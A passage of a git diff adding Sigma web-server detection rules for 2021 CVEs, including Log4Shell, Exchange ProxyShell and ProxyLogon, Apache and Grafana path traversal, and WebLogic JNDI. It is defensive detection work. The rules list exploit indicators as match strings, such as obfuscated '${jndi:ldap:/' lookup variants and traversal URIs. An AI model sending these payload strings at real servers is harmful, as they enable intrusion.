Auth) and CVE-2021-20091 (Config File Injection) + - '..%2f' + - 'apply_abstract.cgi' + noauth_list: + c-uri|contains: + - '/images/' + - '/js/' + - '/css/' + - '/setup_top_login.htm' + - '/login.html' + - '/loginerror.html' + - '/loginexclude.html' + - '/loginlock.html' + condition: (path_traversal or config_file_inj) and noauth_list diff --git a/bin/main/rules/others_web/web_cve_2021_2109_weblogic_rce_exploit.yml b/bin/main/rules/others_web/web_cve_2021_2109_weblogic_rce_exploit.yml new file mode 100644 index 000000000..777706ad2 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_2109_weblogic_rce_exploit.yml @@ -0,0 +1,29 @@ +title: Oracle WebLogic Exploit CVE-2021-2109 +id: 687f6504-7f44-4549-91fc-f07bab065821 +status: experimental +description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109 +author: Bhabesh Raj +date: 2021/01/20 +references: + - https://twitter.com/pyn3rd/status/1351696768065409026 + - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw +logsource: + category: webserver +detection: + selection: + cs-method: 'GET' + c-uri|contains|all: + - 'com.bea.console.handles.JndiBindingHandle' + - 'ldap://' + - 'AdminServer' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical +tags: + - attack.t1190 + - attack.initial_access + - cve.2021.2109 diff --git a/bin/main/rules/others_web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml b/bin/main/rules/others_web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml new file mode 100644 index 000000000..c3227b744 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml @@ -0,0 +1,27 @@ +title: CVE-2021-21972 VSphere Exploitation +id: 179ed852-0f9b-4009-93a7-68475910fd86 +status: experimental +description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 +author: Bhabesh Raj +date: 2021/02/24 +modified: 2021/08/09 +references: + - https://www.vmware.com/security/advisories/VMSA-2021-0002.html + - https://f5.pm/go-59627.html + - https://swarm.ptsecurity.com/unauth-rce-vmware +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri: '/ui/vropspluginui/rest/services/uploadova' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - OVA uploads to your VSphere appliance +level: high +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2021_21978_vmware_view_planner_exploit.yml b/bin/main/rules/others_web/web_cve_2021_21978_vmware_view_planner_exploit.yml new file mode 100644 index 000000000..9e1818b39 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_21978_vmware_view_planner_exploit.yml @@ -0,0 +1,30 @@ +title: CVE-2021-21978 Exploitation Attempt +id: 77586a7f-7ea4-4c41-b19c-820140b84ca9 +status: test +description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978 +author: Bhabesh Raj +references: + - https://twitter.com/wugeej/status/1369476795255320580 + - https://paper.seebug.org/1495/ +date: 2020/03/10 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri|contains|all: + - 'logupload' + - 'logMetaData' + - 'wsgi_log_upload.py' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: high +tags: + - attack.initial_access + - attack.t1190 + - cve.2021.21978 diff --git a/bin/main/rules/others_web/web_cve_2021_22005_vmware_file_upload.yml b/bin/main/rules/others_web/web_cve_2021_22005_vmware_file_upload.yml new file mode 100644 index 000000000..08bfa355a --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_22005_vmware_file_upload.yml @@ -0,0 +1,22 @@ +title: VMware vCenter Server File Upload CVE-2021-22005 +id: b014ea07-8ea0-4859-b517-50a4e5b7ecec +status: experimental +description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server. +author: Sittikorn S +date: 2021/09/24 +references: + - https://kb.vmware.com/s/article/85717 + - https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri|contains: '/analytics/telemetry/ph/api/hyper/send?' + condition: selection +falsepositives: + - Vulnerability Scanning +level: high diff --git a/bin/main/rules/others_web/web_cve_2021_22123_fortinet_exploit.yml b/bin/main/rules/others_web/web_cve_2021_22123_fortinet_exploit.yml new file mode 100644 index 000000000..7968fe82d --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_22123_fortinet_exploit.yml @@ -0,0 +1,30 @@ +title: Fortinet CVE-2021-22123 Exploitation +description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs +id: f425637f-891c-4191-a6c4-3bb1b70513b4 +status: experimental +references: + - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection +author: Bhabesh Raj, Florian Roth +date: 2021/08/19 +modified: 2021/11/23 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: '/api/v2.0/user/remoteserver.saml' + cs-method: POST + filter1: + cs-referer|contains: '/root/user/remote-user/saml-user/' + filter2: + cs-referer: null + condition: selection and not filter1 and not filter2 +fields: + - c-ip + - url + - response +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/others_web/web_cve_2021_22893_pulse_secure_rce_exploit.yml b/bin/main/rules/others_web/web_cve_2021_22893_pulse_secure_rce_exploit.yml new file mode 100644 index 000000000..06da48fa3 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_22893_pulse_secure_rce_exploit.yml @@ -0,0 +1,34 @@ +title: Pulse Connect Secure RCE Attack CVE-2021-22893 +id: 5525edac-f599-4bfd-b926-3fa69860e766 +status: stable +description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) +author: Sittikorn S +date: 2021/06/29 +references: + - https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html + - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection1: + c-uri|contains: + - '/dana-na/auth/' + - '/dana-ws/' + - '/dana-cached/' + selection2: + c-uri|contains: + - '?id=' + - '?token=' + - 'Secid_canceltoken.cgi' + - 'CGI::param' + - 'meeting' + - 'smb' + - 'namedusers' + - 'metric' + condition: selection1 and selection2 +falsepositives: + - Vulnerability Scanning +level: high diff --git a/bin/main/rules/others_web/web_cve_2021_26814_wzuh_rce.yml b/bin/main/rules/others_web/web_cve_2021_26814_wzuh_rce.yml new file mode 100644 index 000000000..c399a6bb9 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_26814_wzuh_rce.yml @@ -0,0 +1,25 @@ +title: Exploitation of CVE-2021-26814 in Wazuh +id: b9888738-29ed-4c54-96a4-f38c57b84bb3 +status: experimental +description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814 +author: Florian Roth +date: 2021/05/22 +references: + - https://github.com/WickdDavid/CVE-2021-26814/blob/main/PoC.py +logsource: + category: webserver +detection: + selection: + c-uri|contains: '/manager/files?path=etc/lists/../../../../..' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: high +tags: + - attack.initial_access + - attack.t1190 + - cve.2021.21978 + - cve.2021.26814 diff --git a/bin/main/rules/others_web/web_cve_2021_26858_iis_rce.yml b/bin/main/rules/others_web/web_cve_2021_26858_iis_rce.yml new file mode 100644 index 000000000..c31fb2d0a --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_26858_iis_rce.yml @@ -0,0 +1,32 @@ +title: ProxyLogon Reset Virtual Directories Based On IIS Log +id: effee1f6-a932-4297-a81f-acb44064fa3a +status: experimental +description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories +references: + - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c +author: frack113 +date: 2021/08/10 +logsource: + product: windows + category: webserver + definition: w3c-logging must be enabled https://docs.microsoft.com/en-us/windows/win32/http/w3c-logging +detection: + selection: + cs-method: 'POST' + sc-status: 200 + cs-uri-stem: '/ecp/DDI/DDIService.svc/SetObject' + cs-uri-query|contains|all: + - 'schema=Reset' + - 'VirtualDirectory' + cs-username|endswith: '$' + keywords: + - 'POST' + - '200' + - '/ecp/DDI/DDIService.svc/SetObject' + - 'schema=Reset' + - 'VirtualDirectory' + - '$' + condition: selection or all of keywords +falsepositives: + - Unlikely +level: critical diff --git a/bin/main/rules/others_web/web_cve_2021_28480_exchange_exploit.yml b/bin/main/rules/others_web/web_cve_2021_28480_exchange_exploit.yml new file mode 100644 index 000000000..ba169ee6e --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_28480_exchange_exploit.yml @@ -0,0 +1,23 @@ +title: Exchange Exploitation CVE-2021-28480 +id: a2a9d722-0acb-4096-bccc-daaf91a5037b +status: experimental +description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 +references: + - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20 +author: Florian Roth +date: 2021/05/14 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: '/owa/calendar/a' + cs-method: 'POST' + filter: + sc-status: 503 + condition: selection and not filter +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/others_web/web_cve_2021_33766_msexchange_proxytoken.yml b/bin/main/rules/others_web/web_cve_2021_33766_msexchange_proxytoken.yml new file mode 100644 index 000000000..85dc9cf97 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_33766_msexchange_proxytoken.yml @@ -0,0 +1,32 @@ +title: CVE-2021-33766 Exchange ProxyToken Exploitation +id: 56973b50-3382-4b56-bdf5-f51a3183797a +status: experimental +description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 +author: Florian Roth, Max Altgelt, Christian Burkard +date: 2021/08/30 +references: + - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection1: + cs-method: 'POST' + c-uri|contains|all: + - '/ecp/' + - '/RulesEditor/InboxRules.svc/NewObject' + sc-status: 500 + selection2: + c-uri|contains|all: + - 'SecurityToken=' + - '/ecp/' + sc-status: 500 + condition: selection1 or selection2 +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/others_web/web_cve_2021_40539_adselfservice.yml b/bin/main/rules/others_web/web_cve_2021_40539_adselfservice.yml new file mode 100644 index 000000000..b64699587 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_40539_adselfservice.yml @@ -0,0 +1,20 @@ +title: ADSelfService Exploitation +id: 6702b13c-e421-44cc-ab33-42cc25570f11 +status: experimental +description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 +author: Tobias Michalski, Max Altgelt +references: + - https://us-cert.cisa.gov/ncas/alerts/aa21-259a +date: 2021/09/20 +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/ServletApi/../RestApi/LogonCustomization' + - '/ServletApi/../RestAPI/Connection' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/bin/main/rules/others_web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml new file mode 100644 index 000000000..6666cbf0d --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -0,0 +1,32 @@ +title: CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit +id: fcbb4a77-f368-4945-b046-4499a1da69d1 +status: experimental +description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). +references: + - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ + - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html + - https://us-cert.cisa.gov/ncas/alerts/aa21-259a +author: Sittikorn S, Nuttakorn Tungpoonsup +date: 2021/09/10 +modified: 2021/09/17 +tags: + - attack.initial_access + - attack.t1190 + - attack.persistence + - attack.t1505.003 +logsource: + category: webserver + definition: 'Must be collect log from \ManageEngine\ADSelfService Plus\logs' +detection: + selection: + c-uri|contains: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/RestAPI/LogonCustomization' + - '/RestAPI/Connection' + condition: selection +fields: + - c-ip + - c-uri +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/others_web/web_cve_2021_41773_apache_path_traversal.yml b/bin/main/rules/others_web/web_cve_2021_41773_apache_path_traversal.yml new file mode 100644 index 000000000..3cf4909da --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_41773_apache_path_traversal.yml @@ -0,0 +1,36 @@ +title: CVE-2021-41773 Exploitation Attempt +id: 3007fec6-e761-4319-91af-e32e20ac43f5 +status: experimental +description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. +author: daffainfo, Florian Roth +date: 2021/10/05 +modified: 2021/10/06 +references: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 + - https://twitter.com/ptswarm/status/1445376079548624899 + - https://twitter.com/h4x0r_dz/status/1445401960371429381 + - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml + - https://twitter.com/bl4sty/status/1445462677824761878 +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '/cgi-bin/.%2e/' + - '/icons/.%2e/' + - '/cgi-bin/.%%32%65/' + - '/icons/.%%32%65/' + - '/cgi-bin/.%%%25%33' + - '/icons/.%%%25%33' + selection_success: + sc-status: + - 200 + - 301 + condition: selection and selection_success +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: high diff --git a/bin/main/rules/others_web/web_cve_2021_42237_sitecore_report_ashx.yml b/bin/main/rules/others_web/web_cve_2021_42237_sitecore_report_ashx.yml new file mode 100644 index 000000000..a769abe10 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_42237_sitecore_report_ashx.yml @@ -0,0 +1,23 @@ +title: Sitecore Pre-Auth RCE CVE-2021-42237 +id: 20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f +status: experimental +description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx +author: Florian Roth +date: 2021/11/17 +references: + - https://blog.assetnote.io/2021/11/02/sitecore-rce/ + - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri|contains: '/sitecore/shell/ClientBin/Reporting/Report.ashx' + sc-status: 200 + condition: selection +falsepositives: + - Vulnerability Scanning +level: high diff --git a/bin/main/rules/others_web/web_cve_2021_43798_grafana.yml b/bin/main/rules/others_web/web_cve_2021_43798_grafana.yml new file mode 100644 index 000000000..e4622ae43 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_43798_grafana.yml @@ -0,0 +1,79 @@ +title: Grafana Path Traversal Exploitation CVE-2021-43798 +id: 7b72b328-5708-414f-9a2a-6a6867c26e16 +status: experimental +description: Detects a successful Grafana path traversal exploitation +author: Florian Roth +references: + - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/ + - https://github.com/search?q=CVE-2021-43798 +date: 2021/12/08 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection_traversal: + c-uri|contains: '/../../../../../../../' + sc-status: 200 + selection_plugins: + c-uri|contains: + - '/public/plugins/live' + - '/public/plugins/icon' + - '/public/plugins/loki' + - '/public/plugins/text' + - '/public/plugins/logs' + - '/public/plugins/news' + - '/public/plugins/stat' + - '/public/plugins/mssql' + - '/public/plugins/mixed' + - '/public/plugins/mysql' + - '/public/plugins/tempo' + - '/public/plugins/graph' + - '/public/plugins/gauge' + - '/public/plugins/table' + - '/public/plugins/debug' + - '/public/plugins/zipkin' + - '/public/plugins/jaeger' + - '/public/plugins/geomap' + - '/public/plugins/canvas' + - '/public/plugins/grafana' + - '/public/plugins/welcome' + - '/public/plugins/xychart' + - '/public/plugins/heatmap' + - '/public/plugins/postgres' + - '/public/plugins/testdata' + - '/public/plugins/opentsdb' + - '/public/plugins/influxdb' + - '/public/plugins/barchart' + - '/public/plugins/annolist' + - '/public/plugins/bargauge' + - '/public/plugins/graphite' + - '/public/plugins/dashlist' + - '/public/plugins/piechart' + - '/public/plugins/dashboard' + - '/public/plugins/nodeGraph' + - '/public/plugins/alertlist' + - '/public/plugins/histogram' + - '/public/plugins/table-old' + - '/public/plugins/pluginlist' + - '/public/plugins/timeseries' + - '/public/plugins/cloudwatch' + - '/public/plugins/prometheus' + - '/public/plugins/stackdriver' + - '/public/plugins/alertGroups' + - '/public/plugins/alertmanager' + - '/public/plugins/elasticsearch' + - '/public/plugins/gettingstarted' + - '/public/plugins/state-timeline' + - '/public/plugins/status-history' + - '/public/plugins/grafana-clock-panel' + - '/public/plugins/grafana-simple-json-datasource' + - '/public/plugins/grafana-azure-monitor-datasource' + condition: all of selection* +fields: + - c-ip + - c-dns +falsepositives: + - Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error +level: critical diff --git a/bin/main/rules/others_web/web_cve_2021_44228_log4j.yml b/bin/main/rules/others_web/web_cve_2021_44228_log4j.yml new file mode 100644 index 000000000..4fc937707 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_44228_log4j.yml @@ -0,0 +1,51 @@ +title: Log4j RCE CVE-2021-44228 Generic +id: 5ea8faa8-db8b-45be-89b0-151b84c82702 +status: experimental +description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell) +author: Florian Roth +date: 2021/12/10 +modified: 2022/02/06 +references: + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://news.ycombinator.com/item?id=29504755 + - https://github.com/tangxiaofeng7/apache-log4j-poc + - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b + - https://github.com/YfryTchsGD/Log4jAttackSurface + - https://twitter.com/shutingrz/status/1469255861394866177?s=21 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + keywords: + - '${jndi:ldap:/' + - '${jndi:rmi:/' + - '${jndi:ldaps:/' + - '${jndi:dns:/' + - '/$%7bjndi:' + - '%24%7bjndi:' + - '$%7Bjndi:' + - '%2524%257Bjndi' + - '%2F%252524%25257Bjndi%3A' + - '${jndi:${lower:' + - '${::-j}${' + - '${jndi:nis' + - '${jndi:nds' + - '${jndi:corba' + - '${jndi:iiop' + - 'Reference Class Name: foo' + - '${${env:BARFOO:-j}' + - '${::-l}${::-d}${::-a}${::-p}' + - '${base64:JHtqbmRp' + - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$' + - '${${lower:j}ndi:' + - '${${upper:j}ndi:' + - '${${::-j}${::-n}${::-d}${::-i}:' + filter: + - 'w.nessus.org/nessus' + - '/nessus}' + condition: keywords and not filter +falsepositives: + - Vulnerability scanning +level: high diff --git a/bin/main/rules/others_web/web_cve_2021_44228_log4j_fields.yml b/bin/main/rules/others_web/web_cve_2021_44228_log4j_fields.yml new file mode 100644 index 000000000..d9db60b6b --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_44228_log4j_fields.yml @@ -0,0 +1,124 @@ +title: Log4j RCE CVE-2021-44228 in Fields +id: 9be472ed-893c-4ec0-94da-312d2765f654 +status: experimental +description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell) +author: Florian Roth +date: 2021/12/10 +modified: 2022/02/06 +references: + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://news.ycombinator.com/item?id=29504755 + - https://github.com/tangxiaofeng7/apache-log4j-poc + - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b + - https://github.com/YfryTchsGD/Log4jAttackSurface + - https://twitter.com/shutingrz/status/1469255861394866177?s=21 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection1: + cs-User-Agent|contains: + - '${jndi:ldap:/' + - '${jndi:rmi:/' + - '${jndi:ldaps:/' + - '${jndi:dns:/' + - '/$%7bjndi:' + - '%24%7bjndi:' + - '$%7Bjndi:' + - '%2524%257Bjndi' + - '%2F%252524%25257Bjndi%3A' + - '${jndi:${lower:' + - '${::-j}${' + - '${jndi:nis' + - '${jndi:nds' + - '${jndi:corba' + - '${jndi:iiop' + - 'Reference Class Name: foo' + - '${${env:BARFOO:-j}' + - '${::-l}${::-d}${::-a}${::-p}' + - '${base64:JHtqbmRp' + - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$' + - '${${lower:j}ndi:' + - '${${upper:j}ndi:' + - '${${::-j}${::-n}${::-d}${::-i}:' + selection2: + user-agent|contains: + - '${jndi:ldap:/' + - '${jndi:rmi:/' + - '${jndi:ldaps:/' + - '${jndi:dns:/' + - '/$%7bjndi:' + - '%24%7bjndi:' + - '$%7Bjndi:' + - '%2524%257Bjndi' + - '%2F%252524%25257Bjndi%3A' + - '${jndi:${lower:' + - '${::-j}${' + - '${jndi:nis' + - '${jndi:nds' + - '${jndi:corba' + - '${jndi:iiop' + - 'Reference Class Name: foo' + - '${${env:BARFOO:-j}' + - '${::-l}${::-d}${::-a}${::-p}' + - '${base64:JHtqbmRp' + - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$' + - '${${lower:j}ndi:' + - '${${upper:j}ndi:' + - '${${::-j}${::-n}${::-d}${::-i}:' + selection3: + cs-uri|contains: + - '${jndi:ldap:/' + - '${jndi:rmi:/' + - '${jndi:ldaps:/' + - '${jndi:dns:/' + - '/$%7bjndi:' + - '%24%7bjndi:' + - '$%7Bjndi:' + - '%2524%257Bjndi' + - '%2F%252524%25257Bjndi%3A' + - '${jndi:${lower:' + - '${::-j}${' + - '${jndi:nis' + - '${jndi:nds' + - '${jndi:corba' + - '${jndi:iiop' + - 'Reference Class Name: foo' + - '${${env:BARFOO:-j}' + - '${::-l}${::-d}${::-a}${::-p}' + - '${base64:JHtqbmRp' + - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$' + - '${${lower:j}ndi:' + - '${${upper:j}ndi:' + - '${${::-j}${::-n}${::-d}${::-i}:' + selection4: + cs-referer|contains: + - '${jndi:ldap:/' + - '${jndi:rmi:/' + - '${jndi:ldaps:/' + - '${jndi:dns:/' + - '/$%7bjndi:' + - '%24%7bjndi:' + - '$%7Bjndi:' + - '%2524%257Bjndi' + - '%2F%252524%25257Bjndi%3A' + - '${jndi:${lower:' + - '${::-j}${' + - '${jndi:nis' + - '${jndi:nds' + - '${jndi:corba' + - '${jndi:iiop' + - 'Reference Class Name: foo' + - '${${env:BARFOO:-j}' + - '${::-l}${::-d}${::-a}${::-p}' + - '${base64:JHtqbmRp' + - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$' + - '${${lower:j}ndi:' + - '${${upper:j}ndi:' + - '${${::-j}${::-n}${::-d}${::-i}:' + condition: 1 of selection* +falsepositives: + - Vulnerability scanning +level: high diff --git a/bin/main/rules/others_web/web_exchange_exploitation_hafnium.yml b/bin/main/rules/others_web/web_exchange_exploitation_hafnium.yml new file mode 100644 index 000000000..28b35918f --- /dev/null +++ b/bin/main/rules/others_web/web_exchange_exploitation_hafnium.yml @@ -0,0 +1,62 @@ +title: Exchange Exploitation Used by HAFNIUM +id: 67bce556-312f-4c81-9162-c3c9ff2599b2 +status: experimental +description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity +references: + - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ + - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ +author: Florian Roth +date: 2021/03/03 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection1: + cs-method: 'POST' + c-uri|contains: '/owa/auth/Current/themes/resources/' + selection2: + cs-method: 'POST' + c-uri|contains: '/owa/auth/Current/' + c-useragent: + - 'DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)' + - 'facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)' + - 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)' + - 'Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)' + - 'Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html' + - 'Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)' + - 'Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)' + - 'Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)' + - 'Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36' + selection3: + c-uri|contains: '/ecp/' + cs-method: 'POST' + c-useragent: + - 'ExchangeServicesClient/0.0.0.0' + - 'python-requests/2.19.1' + - 'python-requests/2.25.1' + selection4: + c-uri|contains: + - '/aspnet_client/' + - '/owa/' + cs-method: 'POST' + c-useragent: + - 'antSword/v2.1' + - 'Googlebot/2.1+(+http://www.googlebot.com/bot.html)' + - 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)' + selection5: + c-uri|contains: + - '/owa/auth/Current/' + - '/ecp/default.flt' + - '/ecp/main.css' + cs-method: 'POST' + selection6: + cs-method: 'POST' + c-uri|contains|all: + - '/ecp/' + - '.js' + condition: 1 of selection* +falsepositives: + - Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related +level: high diff --git a/bin/main/rules/others_web/web_exchange_proxyshell.yml b/bin/main/rules/others_web/web_exchange_proxyshell.yml new file mode 100644 index 000000000..751759022 --- /dev/null +++ b/bin/main/rules/others_web/web_exchange_proxyshell.yml @@ -0,0 +1,38 @@ +title: Exchange ProxyShell Pattern +id: 23eee45e-933b-49f9-ae1b-df706d2d52ef +status: experimental +description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) +references: + - https://youtu.be/5mqid-7zp8k?t=2231 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 +author: Florian Roth, Rich Warren +date: 2021/08/07 +modified: 2021/08/08 +tags: + - attack.initial_access +logsource: + category: webserver +detection: + selection_auto: + c-uri|contains: '/autodiscover.json' + selection_uri: + c-uri|contains: + - '/powershell' + - '/mapi/nspi' + - '/EWS' + - 'X-Rps-CAT' + selection: + sc-status: 401 + selection_poc: + c-uri|contains: + # since we don't know how it will appear in the log files, we'll just use all versions + - 'autodiscover.json?@' + - 'autodiscover.json%3f@' + - '%3f@foo.com' + - 'Email=autodiscover/autodiscover.json' + - 'json?@foo.com' + condition: selection_auto and selection_uri or selection_poc +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/others_web/web_exchange_proxyshell_successful.yml b/bin/main/rules/others_web/web_exchange_proxyshell_successful.yml new file mode 100644 index 000000000..eb0acb362 --- /dev/null +++ b/bin/main/rules/others_web/web_exchange_proxyshell_successful.yml @@ -0,0 +1,31 @@ +title: Successful Exchange ProxyShell Attack +id: 992be1eb-e5da-437e-9a54-6d13b57bb4d8 +status: experimental +description: Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers +references: + - https://youtu.be/5mqid-7zp8k?t=2231 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 +author: Florian Roth, Rich Warren +date: 2021/08/09 +tags: + - attack.initial_access +logsource: + category: webserver +detection: + selection_auto: + c-uri|contains: '/autodiscover.json' + selection_uri: + c-uri|contains: + - '/powershell' + - '/mapi/nspi' + - '/EWS' + - 'X-Rps-CAT' + selection_success: + sc-status: + - 200 + - 301 + condition: selection_auto and selection_uri and selection_success +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/others_web/web_iis_tilt_shortname_scan.yml b/bin/main/rules/others_web/web_iis_tilt_shortname_scan.yml new file mode 100644 index 000000000..7f2358b40 --- /dev/null +++ b/bin/main/rules/others_web/web_iis_tilt_shortname_scan.yml @@ -0,0 +1,30 @@ +title: Successful IIS Shortname Fuzzing Scan +id: 7cb02516-6d95-4ffc-8eee-162075e111ac +status: experimental +author: frack113 +description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. +references: + - https://github.com/projectdiscovery/nuclei-templates/blob/master/fuzzing/iis-shortname.yaml + - https://www.exploit-db.com/exploits/19525 + - https://github.com/lijiejie/IIS_shortname_Scanner +date: 